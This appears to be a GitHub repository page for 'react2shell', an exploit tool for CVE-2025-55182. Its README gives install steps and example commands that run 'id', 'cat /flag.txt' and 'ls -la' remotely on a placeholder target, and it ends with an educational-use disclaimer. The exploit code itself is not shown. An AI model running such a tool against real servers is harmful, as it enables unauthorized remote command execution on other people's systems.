Skip to content

andrei2308/react2shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

React2Shell Exploit - CVE-2025-55182

Author: andrei2308

Install

npm install

Usage

node exploit.js -t <target_url> <command>

Examples

node exploit.js -t http://target.com:3000 "id"
node exploit.js -t http://target.com:3000 "cat /flag.txt"
node exploit.js -t http://target.com:3000 "ls -la"

Help

node exploit.js --help

Disclaimer

For educational purposes only. Unauthorized access is illegal.

About

CVE-2025-55182

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published